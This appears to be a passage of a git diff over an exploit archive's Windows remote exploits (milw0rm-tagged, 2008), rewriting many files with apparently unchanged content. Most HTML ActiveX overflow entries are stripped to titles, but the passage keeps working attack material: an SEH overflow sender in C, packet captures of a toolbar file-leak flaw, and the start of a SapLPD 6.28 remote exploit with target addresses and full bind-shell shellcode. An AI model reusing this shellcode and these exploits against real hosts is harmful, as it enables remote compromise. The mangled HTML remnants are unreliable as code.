+
+  memset (buffer, '\x41', sizeof (buffer));	// fil the buffer to trigger seh
+  send (s, request_1, sizeof (request_1), 0);
+  send (s, buffer, 5104, 0);	// fil the buffer to trigger seh
+  send (s, request_2, sizeof (request_2), 0);
+
+
+  Sleep (100);
+
+  memset (buffer, 0, sizeof (buffer));
+  ret = recv (s, buffer, sizeof (buffer) - 1, 0);
+  //printf("recv: %s\n", buffer);
+
+  Disconnect (s);
+
+  return 0;
+}
+
+// milw0rm.com [2008-01-18]
diff --git a/platforms/windows/remote/4946.html b/platforms/windows/remote/4946.html
index 3e3aa5990..0def3e618 100755
--- a/platforms/windows/remote/4946.html
+++ b/platforms/windows/remote/4946.html
@@ -1,66 +1,66 @@
-
-
-
-
-
-
-
-# milw0rm.com [2008-01-20]
+
+
+
+
+
+
+
+# milw0rm.com [2008-01-20]
diff --git a/platforms/windows/remote/4959.html b/platforms/windows/remote/4959.html
index 92573ee11..9612f1c81 100755
--- a/platforms/windows/remote/4959.html
+++ b/platforms/windows/remote/4959.html
@@ -1,73 +1,73 @@
-
-
- 
-  HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2008-01-22]
+
+
+ 
+  HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2008-01-22]
diff --git a/platforms/windows/remote/4967.html b/platforms/windows/remote/4967.html
index 16c4ee339..cf34a71e9 100755
--- a/platforms/windows/remote/4967.html
+++ b/platforms/windows/remote/4967.html
@@ -1,118 +1,118 @@
-
-
- 
-  Lycos FileUploader Control Buffer Overflow Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2008-01-22]
+
+
+ 
+  Lycos FileUploader Control Buffer Overflow Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2008-01-22]
diff --git a/platforms/windows/remote/4974.html b/platforms/windows/remote/4974.html
index da7939bc8..e9e49f1c0 100755
--- a/platforms/windows/remote/4974.html
+++ b/platforms/windows/remote/4974.html
@@ -1,19 +1,19 @@
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2008-01-23]
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2008-01-23]
diff --git a/platforms/windows/remote/4979.html b/platforms/windows/remote/4979.html
index d3354053e..e1930d44d 100755
--- a/platforms/windows/remote/4979.html
+++ b/platforms/windows/remote/4979.html
@@ -1,120 +1,120 @@
-
-
- 
-  Move Networks Upgrade Manager Control Buffer Overflow Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2008-01-24]
+
+
+ 
+  Move Networks Upgrade Manager Control Buffer Overflow Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2008-01-24]
diff --git a/platforms/windows/remote/4981.html b/platforms/windows/remote/4981.html
index 07c1ba57a..9dea49723 100755
--- a/platforms/windows/remote/4981.html
+++ b/platforms/windows/remote/4981.html
@@ -1,202 +1,202 @@
-
-
-
-
-
-
-
-
-
-----
-
-some wireshark's dump samples:
-
-POST /upload_api.php HTTP/1.1
-Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141
-Content-Length: 21755
-User-Agent: ImageShack Toolbar 4.5.7 ([..])
-Host: load9.imageshack.us
-Connection: Keep-Alive
-Cache-Control: no-cache
-Cookie: imgshck=[..]; un_cookie=1; latest=img404; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1
-
---B-O-U-N-D-A-R-Y731553141
-Content-Disposition: form-data; name="toolbar"
-
-IEImageShackToolbar-4.5.7.69
---B-O-U-N-D-A-R-Y731553141
-Content-Disposition: form-data; name="public"
-
-yes
---B-O-U-N-D-A-R-Y731553141
-Content-Disposition: form-data; name="xml"
-
-newformat
---B-O-U-N-D-A-R-Y731553141
-Content-Disposition: form-data; name="tags"
-
-uhuhinterestingprivatethings
---B-O-U-N-D-A-R-Y731553141
-Content-Disposition: form-data; name="rembar"
-
-1
---B-O-U-N-D-A-R-Y731553141
-Content-Disposition: form-data; name="fileupload"; filename="xp_wallpaper_glass.jpg"
-Content-Type: image/jpeg
-Content-Transfer-Encoding: binary
-
-[file content]
---B-O-U-N-D-A-R-Y731553141
-Content-Disposition: form-data; name="thumbupload"; filename="xp_wallpaper_glass6fa1f1.jpg"
-Content-Type: image/jpeg
-Content-Transfer-Encoding: binary
-
-[file content]
---B-O-U-N-D-A-R-Y731553141
-Content-Disposition: form-data; name="class"
-
-s
---B-O-U-N-D-A-R-Y731553141--
-
-
-reply:
-
-HTTP/1.1 200 OK
-Connection: close
-Transfer-Encoding: chunked
-X-Powered-By: PHP/5.1.2
-Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
-Set-Cookie: PHPSESSID=[..]; path=/
-Set-Cookie: always_opt=-1; path=/; domain=.imageshack.us
-Set-Cookie: rem_bar=1; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
-Expires: Thu, 19 Nov 1981 08:52:00 GMT
-Content-type: text/xml
-Pragma: public
-Cache-Control: must-revalidate, post-check=0, pre-check=0
-Date: Thu, 24 Jan 2008 07:56:25 GMT
-Server: lighttpd/1.4.8
-
-
-  
-    0
-    0.0
-  
-  
-     xpwallpaperglasstq2.jpg
-     xpwallpaperglasstq2.th.jpg
-  
-  
-    426
-    320
-  
-  s
-  
-    87.11.97.155
-  
-  
-    http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg
-    <a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a>
-    [URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg[/IMG][/URL]
-    [url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg][/url]
-    http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg
-    <a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a>
-    [URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg[/IMG][/URL]
-    [url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg][/url]
-    http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg
-    http://img262.imageshack.us/content.php?page=done&l=img262/7959/xpwallpaperglasstq2.jpg
-  
-
-
-with the boot.ini file:
-
-POST /upload_api.php HTTP/1.1
-Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y732118720442
-Content-Length: 1077
-User-Agent: ImageShack Toolbar 4.5.7 (WinNT 5.1 Service Pack 2)
-Host: load10.imageshack.us
-Connection: Keep-Alive
-Cache-Control: no-cache
-Cookie: imgshck=[..]; un_cookie=1; latest=img214; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1; always_opt=-1
-
---B-O-U-N-D-A-R-Y732118720442
-Content-Disposition: form-data; name="toolbar"
-
-IEImageShackToolbar-4.5.7.69
---B-O-U-N-D-A-R-Y732118720442
-Content-Disposition: form-data; name="public"
-
-yes
---B-O-U-N-D-A-R-Y732118720442
-Content-Disposition: form-data; name="xml"
-
-newformat
---B-O-U-N-D-A-R-Y732118720442
-Content-Disposition: form-data; name="tags"
-
-uhuhinterestingprivatethings
---B-O-U-N-D-A-R-Y732118720442
-Content-Disposition: form-data; name="rembar"
-
-1
---B-O-U-N-D-A-R-Y732118720442
-Content-Disposition: form-data; name="fileupload"; filename="boot.ini"
-Content-Type: application/octet-stream
-Content-Transfer-Encoding: binary
-
-[boot loader]
-timeout=30
-default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
-[operating systems]
-multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" / fastdetect /NoExecute=OptIn
---B-O-U-N-D-A-R-Y732118720442
-Content-Disposition: form-data; name="class"
-
-s
---B-O-U-N-D-A-R-Y732118720442--
-
-reply:
-
-HTTP/1.1 200 OK
-Transfer-Encoding: chunked
-X-Powered-By: PHP/5.1.2
-Content-Type: text/xml
-Set-Cookie: latest=img89; expires=Sun, 18-Jan-2009 07:56:28 GMT; path=/; domain=.imageshack.us
-Date: Thu, 24 Jan 2008 07:56:28 GMT
-Server: lighttpd/1.4.18
-
-
-Wrong file type detected for file boot.ini:application/octet-stream
-
-
-# milw0rm.com [2008-01-24]
+
+
+
+
+
+
+
+
+
+----
+
+some wireshark's dump samples:
+
+POST /upload_api.php HTTP/1.1
+Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y731553141
+Content-Length: 21755
+User-Agent: ImageShack Toolbar 4.5.7 ([..])
+Host: load9.imageshack.us
+Connection: Keep-Alive
+Cache-Control: no-cache
+Cookie: imgshck=[..]; un_cookie=1; latest=img404; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1
+
+--B-O-U-N-D-A-R-Y731553141
+Content-Disposition: form-data; name="toolbar"
+
+IEImageShackToolbar-4.5.7.69
+--B-O-U-N-D-A-R-Y731553141
+Content-Disposition: form-data; name="public"
+
+yes
+--B-O-U-N-D-A-R-Y731553141
+Content-Disposition: form-data; name="xml"
+
+newformat
+--B-O-U-N-D-A-R-Y731553141
+Content-Disposition: form-data; name="tags"
+
+uhuhinterestingprivatethings
+--B-O-U-N-D-A-R-Y731553141
+Content-Disposition: form-data; name="rembar"
+
+1
+--B-O-U-N-D-A-R-Y731553141
+Content-Disposition: form-data; name="fileupload"; filename="xp_wallpaper_glass.jpg"
+Content-Type: image/jpeg
+Content-Transfer-Encoding: binary
+
+[file content]
+--B-O-U-N-D-A-R-Y731553141
+Content-Disposition: form-data; name="thumbupload"; filename="xp_wallpaper_glass6fa1f1.jpg"
+Content-Type: image/jpeg
+Content-Transfer-Encoding: binary
+
+[file content]
+--B-O-U-N-D-A-R-Y731553141
+Content-Disposition: form-data; name="class"
+
+s
+--B-O-U-N-D-A-R-Y731553141--
+
+
+reply:
+
+HTTP/1.1 200 OK
+Connection: close
+Transfer-Encoding: chunked
+X-Powered-By: PHP/5.1.2
+Set-Cookie: latest=img262; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
+Set-Cookie: PHPSESSID=[..]; path=/
+Set-Cookie: always_opt=-1; path=/; domain=.imageshack.us
+Set-Cookie: rem_bar=1; expires=Sun, 18-Jan-2009 07:56:24 GMT; path=/; domain=.imageshack.us
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Content-type: text/xml
+Pragma: public
+Cache-Control: must-revalidate, post-check=0, pre-check=0
+Date: Thu, 24 Jan 2008 07:56:25 GMT
+Server: lighttpd/1.4.8
+
+
+  
+    0
+    0.0
+  
+  
+     xpwallpaperglasstq2.jpg
+     xpwallpaperglasstq2.th.jpg
+  
+  
+    426
+    320
+  
+  s
+  
+    87.11.97.155
+  
+  
+    http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg
+    <a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a>
+    [URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg[/IMG][/URL]
+    [url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.jpg][/url]
+    http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg
+    <a href="http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg" target="_blank"><img src="http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg" alt="Free Image Hosting at www.ImageShack.us" border="0"/></a>
+    [URL=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][IMG]http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg[/IMG][/URL]
+    [url=http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg][img=http://img262.imageshack.us/img262/7959/xpwallpaperglasstq2.th.jpg][/url]
+    http://img262.imageshack.us/my.php?image=xpwallpaperglasstq2.jpg
+    http://img262.imageshack.us/content.php?page=done&l=img262/7959/xpwallpaperglasstq2.jpg
+  
+
+
+with the boot.ini file:
+
+POST /upload_api.php HTTP/1.1
+Content-Type: multipart/form-data, boundary=B-O-U-N-D-A-R-Y732118720442
+Content-Length: 1077
+User-Agent: ImageShack Toolbar 4.5.7 (WinNT 5.1 Service Pack 2)
+Host: load10.imageshack.us
+Connection: Keep-Alive
+Cache-Control: no-cache
+Cookie: imgshck=[..]; un_cookie=1; latest=img214; flashInstalled=9.0; __qca=[..]; rem_bar=1; nopopunder=1; always_opt=-1
+
+--B-O-U-N-D-A-R-Y732118720442
+Content-Disposition: form-data; name="toolbar"
+
+IEImageShackToolbar-4.5.7.69
+--B-O-U-N-D-A-R-Y732118720442
+Content-Disposition: form-data; name="public"
+
+yes
+--B-O-U-N-D-A-R-Y732118720442
+Content-Disposition: form-data; name="xml"
+
+newformat
+--B-O-U-N-D-A-R-Y732118720442
+Content-Disposition: form-data; name="tags"
+
+uhuhinterestingprivatethings
+--B-O-U-N-D-A-R-Y732118720442
+Content-Disposition: form-data; name="rembar"
+
+1
+--B-O-U-N-D-A-R-Y732118720442
+Content-Disposition: form-data; name="fileupload"; filename="boot.ini"
+Content-Type: application/octet-stream
+Content-Transfer-Encoding: binary
+
+[boot loader]
+timeout=30
+default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
+[operating systems]
+multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Home Edition" / fastdetect /NoExecute=OptIn
+--B-O-U-N-D-A-R-Y732118720442
+Content-Disposition: form-data; name="class"
+
+s
+--B-O-U-N-D-A-R-Y732118720442--
+
+reply:
+
+HTTP/1.1 200 OK
+Transfer-Encoding: chunked
+X-Powered-By: PHP/5.1.2
+Content-Type: text/xml
+Set-Cookie: latest=img89; expires=Sun, 18-Jan-2009 07:56:28 GMT; path=/; domain=.imageshack.us
+Date: Thu, 24 Jan 2008 07:56:28 GMT
+Server: lighttpd/1.4.18
+
+
+Wrong file type detected for file boot.ini:application/octet-stream
+
+
+# milw0rm.com [2008-01-24]
diff --git a/platforms/windows/remote/4982.html b/platforms/windows/remote/4982.html
index 7587d9da2..23764d09e 100755
--- a/platforms/windows/remote/4982.html
+++ b/platforms/windows/remote/4982.html
@@ -1,120 +1,120 @@
-
-
- 
-  Gateway WebLaunch Buffer Overflow Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2008-01-25]
+
+
+ 
+  Gateway WebLaunch Buffer Overflow Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2008-01-25]
diff --git a/platforms/windows/remote/4986.html b/platforms/windows/remote/4986.html
index ce987c6eb..55bd11e10 100755
--- a/platforms/windows/remote/4986.html
+++ b/platforms/windows/remote/4986.html
@@ -1,35 +1,35 @@
-
-
-
-
-
- 
-
- 
-  Namo Web Editor NamoInstaller.dll install Method Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-tml>
-
--->
-
-# milw0rm.com [2008-01-25]
+
+
+
+
+
+ 
+
+ 
+  Namo Web Editor NamoInstaller.dll install Method Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+tml>
+
+-->
+
+# milw0rm.com [2008-01-25]
diff --git a/platforms/windows/remote/4987.html b/platforms/windows/remote/4987.html
index 52689f115..d5b8864eb 100755
--- a/platforms/windows/remote/4987.html
+++ b/platforms/windows/remote/4987.html
@@ -1,118 +1,118 @@
-
-
- 
-  Persits XUpload 3.0 AddFile() Buffer Overflow Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2008-01-25]
+
+
+ 
+  Persits XUpload 3.0 AddFile() Buffer Overflow Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2008-01-25]
diff --git a/platforms/windows/remote/4999.htm b/platforms/windows/remote/4999.htm
index 831459d08..0a41fde06 100755
--- a/platforms/windows/remote/4999.htm
+++ b/platforms/windows/remote/4999.htm
@@ -1,33 +1,33 @@
-
-
-
    
-
-
    =======================================================================
-
    
- MailBee Objects v5.5 (MailBee.dll) Insecure Method
    
- Web site : http://www.afterlogic.com/
    
-=======================================================================
- 
    Author: darkl0rd
- 
    E-mail: l_l_darkl0rd_l_l@yahoo.com
    
- Tested on Windows XP Professional SP2 , with Internet Explorer 6
-
    
-
-
    
-
-

    Save Files
-
     
    Creat Files
    
-
    
-d'/
-    
-
-# milw0rm.com [2008-01-28]
+
+
+
    
+
+
    =======================================================================
+
    
+ MailBee Objects v5.5 (MailBee.dll) Insecure Method
    
+ Web site : http://www.afterlogic.com/
    
+=======================================================================
+ 
    Author: darkl0rd
+ 
    E-mail: l_l_darkl0rd_l_l@yahoo.com
    
+ Tested on Windows XP Professional SP2 , with Internet Explorer 6
+
    
+
+
    
+
+

    Save Files
+
     
    Creat Files
    
+
    
+d'/
+    
+
+# milw0rm.com [2008-01-28]
diff --git a/platforms/windows/remote/5005.html b/platforms/windows/remote/5005.html
index 85543c91d..1541b9175 100755
--- a/platforms/windows/remote/5005.html
+++ b/platforms/windows/remote/5005.html
@@ -1,33 +1,33 @@
-
-
-
    Chilkat Mail 
-ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit
    
-
    Site :
-www.chilkatsoft.com
    
-
    
-===================================================
    
-
    Tested on 
-Windows XP Professional SP2 , with Internet Explorer 6
    
-
    Author : 
-darkl0rd
    
-
    E-Mail : 
-l_l_darkl0rd_l_l[at]yahoo[dot]com
    
-
    SaveLastError
    
-
    
-
-
-
-
-
-
-
-
    
-
-
-# milw0rm.com [2008-01-29]
+
+
+
    Chilkat Mail 
+ActiveX 7.8 (ChilkatCert.dll) Insecure Method Exploit
    
+
    Site :
+www.chilkatsoft.com
    
+
    
+===================================================
    
+
    Tested on 
+Windows XP Professional SP2 , with Internet Explorer 6
    
+
    Author : 
+darkl0rd
    
+
    E-Mail : 
+l_l_darkl0rd_l_l[at]yahoo[dot]com
    
+
    SaveLastError
    
+
    
+
+
+
+
+
+
+
+
    
+
+
+# milw0rm.com [2008-01-29]
diff --git a/platforms/windows/remote/5025.html b/platforms/windows/remote/5025.html
index cd137fa37..979f6c837 100755
--- a/platforms/windows/remote/5025.html
+++ b/platforms/windows/remote/5025.html
@@ -1,119 +1,119 @@
-
-
- 
-  MySpace Uploader Buffer Overflow Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2008-01-31]
+
+
+ 
+  MySpace Uploader Buffer Overflow Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2008-01-31]
diff --git a/platforms/windows/remote/5028.html b/platforms/windows/remote/5028.html
index 21d72c8dc..dfe49cf7c 100755
--- a/platforms/windows/remote/5028.html
+++ b/platforms/windows/remote/5028.html
@@ -1,24 +1,24 @@
-
-
-
    
-
-
    =======================================================================
-
    
- 
    Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method

     Web site : www.chilkatsoft.com

    =======================================================================
    Author: darkl0rd
     
    E-mail: l_l_darkl0rd_l_l@yahoo.com

     Tested on Windows XP Professional SP2 , with Internet Explorer 6
    Class privateKey
    GUID: {A934AEE3-8896-485F-8A55-ACF2A87BD010}
    Number of Interfaces: 1
    Default Interface: IPrivateKey
    SavePkcs8File
    
-
-
    
-
-
-
-
-
-
    
-
-
-# milw0rm.com [2008-01-31]
+
+
+
    
+
+
    =======================================================================
+
    
+ 
    Chilkat FTP ActiveX 2.0 (ChilkatCert.dll) Insecure Method

     Web site : www.chilkatsoft.com

    =======================================================================
    Author: darkl0rd
     
    E-mail: l_l_darkl0rd_l_l@yahoo.com

     Tested on Windows XP Professional SP2 , with Internet Explorer 6
    Class privateKey
    GUID: {A934AEE3-8896-485F-8A55-ACF2A87BD010}
    Number of Interfaces: 1
    Default Interface: IPrivateKey
    SavePkcs8File
    
+
+
    
+
+
+
+
+
+
    
+
+
+# milw0rm.com [2008-01-31]
diff --git a/platforms/windows/remote/5045.html b/platforms/windows/remote/5045.html
index 8f3eb1d30..40bbe69e9 100755
--- a/platforms/windows/remote/5045.html
+++ b/platforms/windows/remote/5045.html
@@ -1,37 +1,37 @@
-
-
-
-
-
-
-
-
-
-# milw0rm.com [2008-02-03]
+
+
+
+
+
+
+
+
+
+# milw0rm.com [2008-02-03]
diff --git a/platforms/windows/remote/5046.php b/platforms/windows/remote/5046.php
index 8ef7fc5a6..514604076 100755
--- a/platforms/windows/remote/5046.php
+++ b/platforms/windows/remote/5046.php
@@ -1,87 +1,87 @@
-
-
-
-	function unescape($s){
-		$res=strtoupper(bin2hex($s));
-		$g = round(strlen($res)/4);
-		if ($g != (strlen($res)/4))$res.="00";
-		$out = "";
-		for ($i=0; $i
-		
-		
-		
-		
-		
-	';
-
-?>
-
-# milw0rm.com [2008-02-03]
+
+
+
+	function unescape($s){
+		$res=strtoupper(bin2hex($s));
+		$g = round(strlen($res)/4);
+		if ($g != (strlen($res)/4))$res.="00";
+		$out = "";
+		for ($i=0; $i
+		
+		
+		
+		
+		
+	';
+
+?>
+
+# milw0rm.com [2008-02-03]
diff --git a/platforms/windows/remote/5048.html b/platforms/windows/remote/5048.html
index 208dd8c64..40cc4a0e6 100755
--- a/platforms/windows/remote/5048.html
+++ b/platforms/windows/remote/5048.html
@@ -1,60 +1,60 @@
-
-
-
-
-
-
-
-
-# milw0rm.com [2008-02-03]
+
+
+
+
+
+
+
+
+# milw0rm.com [2008-02-03]
diff --git a/platforms/windows/remote/5049.html b/platforms/windows/remote/5049.html
index e711d0e29..65e38d73c 100755
--- a/platforms/windows/remote/5049.html
+++ b/platforms/windows/remote/5049.html
@@ -1,132 +1,132 @@
-
-
- 
-  FaceBook PhotoUploader Buffer Overflow Exploit
-  
-  
- 
-    
-     Unable to create object
-    
- 
-
-
-# milw0rm.com [2008-02-03]
+
+
+ 
+  FaceBook PhotoUploader Buffer Overflow Exploit
+  
+  
+ 
+    
+     Unable to create object
+    
+ 
+
+
+# milw0rm.com [2008-02-03]
diff --git a/platforms/windows/remote/5051.html b/platforms/windows/remote/5051.html
index e23e05c6d..dc366a6b7 100755
--- a/platforms/windows/remote/5051.html
+++ b/platforms/windows/remote/5051.html
@@ -1,121 +1,121 @@
-
-
- 
-  Yahoo! JukeBox datagrid.dll AddButton() Buffer Overflow Exploit
-  
-  
- 
-	
-		Unable to create object
-	
- 
-
-
-# milw0rm.com [2008-02-03]
+
+
+ 
+  Yahoo! JukeBox datagrid.dll AddButton() Buffer Overflow Exploit
+  
+  
+ 
+	
+		Unable to create object
+	
+ 
+
+
+# milw0rm.com [2008-02-03]
diff --git a/platforms/windows/remote/5052.html b/platforms/windows/remote/5052.html
index d1520b0fd..cedc9923f 100755
--- a/platforms/windows/remote/5052.html
+++ b/platforms/windows/remote/5052.html
@@ -1,119 +1,119 @@
-
-
- 
-  Yahoo! JukeBox MediaGrid ActiveX Control mediagrid.dll AddBitmap() Buffer Overflow Exploit
-  
-  
- 
-	
-		Unable to create object
-	
- 
-
-
-# milw0rm.com [2008-02-03]
+
+
+ 
+  Yahoo! JukeBox MediaGrid ActiveX Control mediagrid.dll AddBitmap() Buffer Overflow Exploit
+  
+  
+ 
+	
+		Unable to create object
+	
+ 
+
+
+# milw0rm.com [2008-02-03]
diff --git a/platforms/windows/remote/5078.htm b/platforms/windows/remote/5078.htm
index f4ee49bd5..70b3cc29b 100755
--- a/platforms/windows/remote/5078.htm
+++ b/platforms/windows/remote/5078.htm
@@ -1,19 +1,19 @@
-
-
-  File Upload POC
-  
-    
     Backup Exec System Recovery Manager 7.0
    File Upload POC
    
-    
    
-      Remote Path: 
    
-	File to upload: 
    
-      
    
-      
    
-	  
    
-(c)BastardLabs 2008.
-  
-
-
-# milw0rm.com [2008-02-07]
+
+
+  File Upload POC
+  
+    
     Backup Exec System Recovery Manager 7.0
    File Upload POC
    
+    
    
+      Remote Path: 
    
+	File to upload: 
    
+      
    
+      
    
+	  
    
+(c)BastardLabs 2008.
+  
+
+
+# milw0rm.com [2008-02-07]
diff --git a/platforms/windows/remote/5079.c b/platforms/windows/remote/5079.c
index dbb35d887..563ca440e 100755
--- a/platforms/windows/remote/5079.c
+++ b/platforms/windows/remote/5079.c
@@ -1,357 +1,357 @@
-/*
-	http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060042.html
-
-	Exploit for SapLPD 6.28 Win32 by BackBone
-	Tested with SapLPD 6.28 on Windows XP SP2
-
-	Groetjes aan mijn sletjes Ops,Doop,Gabber,head,ps,sj,dd en de rest!
-*/
-
-#include 
-#include 
-#include 
-#pragma comment (lib,"ws2_32")
-
-#define DEFAULT_PORT 515
-
-char ASCII_SHIT[]=
-"\r\n"
-"\t\t   ______              ______\r\n"  
-"\t\t  (, /   )        /)  (, /   )\r\n"
-"\t\t    /---(  _   _ (/_    /---(  _____    _\r\n" 
-"\t\t ) / ____)(_(_(__/(__) / ____)(_) / (__(/_\r\n"
-"\t\t(_/ (               (_/ (    (c) 2008\r\n"
-"\r\n";
-
-struct
-{
-	LPSTR lpVersion;
-	DWORD dwOffset;
-	DWORD dwRetAddr;
-	BYTE  bLPDCmd;
-}
-targets[]=
-{
-	// exploit works with cmd 0x01,0x02,0x03,...
-	{"SAPLPD Version 6.28 for Windows/NT (TEST)",484,0x0012F0A1,0x01}, // addr of shellcode -> 0x0012F0A1
-	{"SAPLPD Version 6.28 for Windows/NT",484,0x004E0BB7,0x01}, // jmp esp 0x004E0BB7 -> SAPLpd.exe 6.28
-},v;
-
-
-// don't change the offset
-#define PORT_OFFSET 170
-#define BIND_PORT   10282
-
-// bindshell shellcode from www.metasploit.com,mod by skylined
-unsigned char shellcode[] =
-  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
-  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
-  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
-  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
-  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
-  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
-  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
-  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
-  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
-  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
-  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
-  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
-  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
-  "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
-  "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
-  "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
-  "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
-  "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
-  "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
-  "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
-  "\x83\xc4\x5c\x61\xeb\x89";
-
-#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p);
-
-BOOL StartupWinsock(void)
-{
-	WSADATA wsa;
-
-	return !WSAStartup(MAKEWORD(2,0),&wsa);
-}
-
-DWORD LookupAddress(LPSTR lpHost)
-{
-	DWORD dwRemoteAddr=inet_addr(lpHost);
-
-	if (dwRemoteAddr==INADDR_NONE)
-	{
-		struct hostent* pHostEnt=gethostbyname(lpHost);
-		if (pHostEnt==0)
-			return INADDR_NONE;
-		dwRemoteAddr = *((DWORD*)pHostEnt->h_addr_list[0]);
-	}
-
-	return dwRemoteAddr;
-}
-
